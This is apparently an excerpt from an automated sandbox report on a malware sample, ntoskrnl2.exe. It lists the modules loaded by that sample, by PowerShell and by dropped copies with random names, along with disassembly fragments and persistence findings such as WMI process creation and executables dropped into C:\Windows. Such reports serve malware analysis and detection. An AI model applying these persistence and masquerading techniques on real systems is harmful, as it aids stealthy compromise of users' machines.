                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                    Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
                    Source: C:\Windows\Containers\GFIYCbjKVID.exeSection loaded: mscoree.dll
                    Source: C:\Windows\Containers\GFIYCbjKVID.exeSection loaded: apphelp.dll
                    Source: C:\Windows\Containers\GFIYCbjKVID.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\Containers\GFIYCbjKVID.exeSection loaded: version.dll
                    Source: C:\Windows\Containers\GFIYCbjKVID.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\Containers\GFIYCbjKVID.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Containers\GFIYCbjKVID.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Containers\GFIYCbjKVID.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\Containers\GFIYCbjKVID.exeSection loaded: wldp.dll
                    Source: C:\Windows\Containers\GFIYCbjKVID.exeSection loaded: amsi.dll
                    Source: C:\Windows\Containers\GFIYCbjKVID.exeSection loaded: userenv.dll
                    Source: C:\Windows\Containers\GFIYCbjKVID.exeSection loaded: profapi.dll
                    Source: C:\Windows\Containers\GFIYCbjKVID.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\Containers\GFIYCbjKVID.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\Containers\GFIYCbjKVID.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\Containers\GFIYCbjKVID.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\Containers\GFIYCbjKVID.exeSection loaded: sspicli.dll
                    Source: C:\Windows\Containers\GFIYCbjKVID.exeSection loaded: mscoree.dll
                    Source: C:\Windows\Containers\GFIYCbjKVID.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\Containers\GFIYCbjKVID.exeSection loaded: version.dll
                    Source: C:\Windows\Containers\GFIYCbjKVID.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\Containers\GFIYCbjKVID.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Containers\GFIYCbjKVID.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Containers\GFIYCbjKVID.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\Containers\GFIYCbjKVID.exeSection loaded: wldp.dll
                    Source: C:\Windows\Containers\GFIYCbjKVID.exeSection loaded: amsi.dll
                    Source: C:\Windows\Containers\GFIYCbjKVID.exeSection loaded: userenv.dll
                    Source: C:\Windows\Containers\GFIYCbjKVID.exeSection loaded: profapi.dll
                    Source: C:\Windows\Containers\GFIYCbjKVID.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\Containers\GFIYCbjKVID.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\Containers\GFIYCbjKVID.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\Containers\GFIYCbjKVID.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\Containers\GFIYCbjKVID.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                    Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeSection loaded: version.dll
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeSection loaded: wldp.dll
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeSection loaded: amsi.dll
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeSection loaded: userenv.dll
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeSection loaded: profapi.dll
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeSection loaded: ktmw32.dll
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeSection loaded: rasapi32.dll
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeSection loaded: rasman.dll
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeSection loaded: rtutils.dll
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeSection loaded: version.dll
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeSection loaded: wldp.dll
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeSection loaded: amsi.dll
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeSection loaded: userenv.dll
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeSection loaded: profapi.dll
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                    Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                    Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dll
                    Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dll
                    Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dll
                    Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\GFIYCbjKVID.exeSection loaded: mscoree.dll
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\GFIYCbjKVID.exeSection loaded: apphelp.dll
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\GFIYCbjKVID.exeSection loaded: kernel.appcore.dll
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\GFIYCbjKVID.exeSection loaded: version.dll
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\GFIYCbjKVID.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\GFIYCbjKVID.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\GFIYCbjKVID.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\GFIYCbjKVID.exeSection loaded: uxtheme.dll
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\GFIYCbjKVID.exeSection loaded: wldp.dll
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\GFIYCbjKVID.exeSection loaded: amsi.dll
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\GFIYCbjKVID.exeSection loaded: userenv.dll
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\GFIYCbjKVID.exeSection loaded: profapi.dll
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\GFIYCbjKVID.exeSection loaded: windows.storage.dll
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\GFIYCbjKVID.exeSection loaded: cryptsp.dll
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\GFIYCbjKVID.exeSection loaded: rsaenh.dll
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\GFIYCbjKVID.exeSection loaded: cryptbase.dll
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\GFIYCbjKVID.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeDirectory created: C:\Program Files\Reference Assemblies\Microsoft\Framework\GFIYCbjKVID.exeJump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeDirectory created: C:\Program Files\Reference Assemblies\Microsoft\Framework\d899e5aa4a0be6Jump to behavior
                    Source: ntoskrnl2.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: ntoskrnl2.exeStatic file information: File size 1430164 > 1048576
                    Source: ntoskrnl2.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeCode function: 0_2_00007FF848F450C0 push esp; iretd 0_2_00007FF848F450C3
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeCode function: 0_2_00007FF848F43BB8 push esp; retf 0_2_00007FF848F43BB9
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeCode function: 0_2_00007FF84931D43D push esp; ret 0_2_00007FF84931D43E
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeCode function: 0_2_00007FF84931D0DB push edi; ret 0_2_00007FF84931D0DC
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeCode function: 0_2_00007FF84931D3D0 push 00000054h; ret 0_2_00007FF84931D3D4
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00007FF848E0D2A5 pushad ; iretd 20_2_00007FF848E0D2A6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00007FF848FF2316 push 8B485F93h; iretd 20_2_00007FF848FF231B
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_00007FF848DFD2A5 pushad ; iretd 21_2_00007FF848DFD2A6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_00007FF848F1C445 push ebx; retf 21_2_00007FF848F1C44A
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF848DED2A5 pushad ; iretd 23_2_00007FF848DED2A6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FF848FD2316 push 8B485F95h; iretd 23_2_00007FF848FD231B
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF848DFD2A5 pushad ; iretd 25_2_00007FF848DFD2A6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF848FE2316 push 8B485F94h; iretd 25_2_00007FF848FE231B
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 27_2_00007FF848DFD2A5 pushad ; iretd 27_2_00007FF848DFD2A6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 27_2_00007FF848FE2316 push 8B485F94h; iretd 27_2_00007FF848FE231B
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 29_2_00007FF848DFD2A5 pushad ; iretd 29_2_00007FF848DFD2A6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 29_2_00007FF848FE2316 push 8B485F94h; iretd 29_2_00007FF848FE231B
                    Source: C:\Windows\Containers\GFIYCbjKVID.exeCode function: 34_2_00007FF848F150C0 push esp; iretd 34_2_00007FF848F150C3
                    Source: C:\Windows\Containers\GFIYCbjKVID.exeCode function: 34_2_00007FF848F13BB8 push esp; retf 34_2_00007FF848F13BB9
                    Source: C:\Windows\Containers\GFIYCbjKVID.exeCode function: 35_2_00007FF848F150C0 push esp; iretd 35_2_00007FF848F150C3
                    Source: C:\Windows\Containers\GFIYCbjKVID.exeCode function: 35_2_00007FF848F13BB8 push esp; retf 35_2_00007FF848F13BB9
                    Source: C:\Windows\Containers\GFIYCbjKVID.exeCode function: 35_2_00007FF848F26DCB push ecx; iretd 35_2_00007FF848F26DCC
                    Source: C:\Windows\Containers\GFIYCbjKVID.exeCode function: 35_2_00007FF848F29833 push 8B48FFFFh; iretd 35_2_00007FF848F29838
                    Source: C:\Windows\Containers\GFIYCbjKVID.exeCode function: 35_2_00007FF848F28CB9 push eax; retf 35_2_00007FF848F28CBF
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeCode function: 37_2_00007FF848F250C0 push esp; iretd 37_2_00007FF848F250C3
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeCode function: 37_2_00007FF848F23BB8 push esp; retf 37_2_00007FF848F23BB9
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeCode function: 37_2_00007FF8492FD614 push edx; ret 37_2_00007FF8492FD615
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeCode function: 37_2_00007FF8492FD3FA push esp; ret 37_2_00007FF8492FD3FE
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeCode function: 37_2_00007FF8492FD09B push edi; ret 37_2_00007FF8492FD09C
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeCode function: 37_2_00007FF8492F9F16 push ss; iretd 37_2_00007FF8492F9F17
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeCode function: 37_2_00007FF8492FD390 push esp; ret 37_2_00007FF8492FD394

                    Persistence and Installation Behavior

                    barindex
                    Creates processes via WMI
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                    Drops executables to the windows directory (C:\Windows) and starts them
